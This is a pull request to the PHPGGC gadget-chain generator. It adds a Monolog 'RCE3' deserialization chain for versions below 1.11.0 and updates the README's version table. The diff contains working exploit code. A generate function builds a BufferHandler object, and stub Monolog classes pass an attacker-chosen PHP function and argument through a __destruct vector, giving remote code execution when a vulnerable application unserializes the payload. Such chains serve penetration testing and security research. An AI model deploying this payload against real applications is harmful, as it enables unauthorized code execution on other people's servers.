### PR TITLE
Added Monolog < 1.11.0 RCE

### DIFF
--- a/README.md
+++ b/README.md
@@ -37,8 +37,9 @@ Laravel/RCE5                              5.8.30                         rce    
 Laravel/RCE6                              5.5.*                          rce              __destruct     *
 Magento/FW1                               ? <= 1.9.4.0                   file_write       __destruct     *
 Magento/SQLI1                             ? <= 1.9.4.0                   sql_injection    __destruct
-Monolog/RCE1                              1.18 <= 1.23                   rce              __destruct
+Monolog/RCE1                              1.18 <= 2.0.2                  rce              __destruct
 Monolog/RCE2                              1.5 <= 1.17                    rce              __destruct
+Monolog/RCE3                              < 1.11.0                       rce              __destruct
 Phalcon/RCE1                              <= 1.2.2                       rce              __wakeup       *
 Pydio/Guzzle/RCE1                         < 8.2.2                        rce              __toString
 Slim/RCE1                                 3.8.1                          rce              __toString

--- a/gadgetchains/Monolog/RCE/3/chain.php
+++ b/gadgetchains/Monolog/RCE/3/chain.php
@@ -2,22 +2,20 @@
 
 namespace GadgetChain\Monolog;
 
-class RCE1 extends \PHPGGC\GadgetChain\RCE
+class RCE3 extends \PHPGGC\GadgetChain\RCE
 {
-    public static $version = '1.18 <= 2.0.2';
+    public static $version = '< 1.11.0';
     public static $vector = '__destruct';
-    public static $author = 'cf';
+    public static $author = 'theBumble';
 
     public function generate(array $parameters)
     {
         $function = $parameters['function'];
         $parameter = $parameters['parameter'];
 
-        return new \Monolog\Handler\SyslogUdpHandler(
-            new \Monolog\Handler\BufferHandler(
+        return new \Monolog\Handler\BufferHandler(
                 ['current', $function],
                 [$parameter, 'level' => null]
-            )
         );
     }
 }

--- a/gadgetchains/Monolog/RCE/3/gadgets.php
+++ b/gadgetchains/Monolog/RCE/3/gadgets.php
@@ -1,0 +1,40 @@
+<?php
+
+namespace Monolog\Handler
+{
+    class NativeMailerHandler {
+        protected $to = null;
+        protected $subject = null;
+        protected $headers = null;
+
+        protected $level = null;
+        protected $bubble = false;
+        protected $formatter = null;
+        protected $processors;
+
+        function __construct($methods) {
+            $this->processors = $methods;
+
+        }
+    }
+
+    class BufferHandler
+    {
+        protected $handler;
+        protected $bufferSize = -1;
+        protected $buffer;
+
+        # ($record['level'] < $this->level) == false
+        protected $level = null;
+        protected $bubble = false;
+        protected $formatter = null;
+        protected $processors;
+
+        function __construct($methods, $command)
+        {
+            $this->processors = null;
+            $this->buffer = [$command];
+            $this->handler = new NativeMailerHandler($methods);
+        }
+    }
+}


### PR DESCRIPTION
Inspired by Monolog RCE1 and RCE2, this chain (RCE3) uses a similar approach with compatibility for all releases less than 1.11.0.

I also updated the version coverage information for the RCE1 gadget. It still works with latest. :)

Thank you!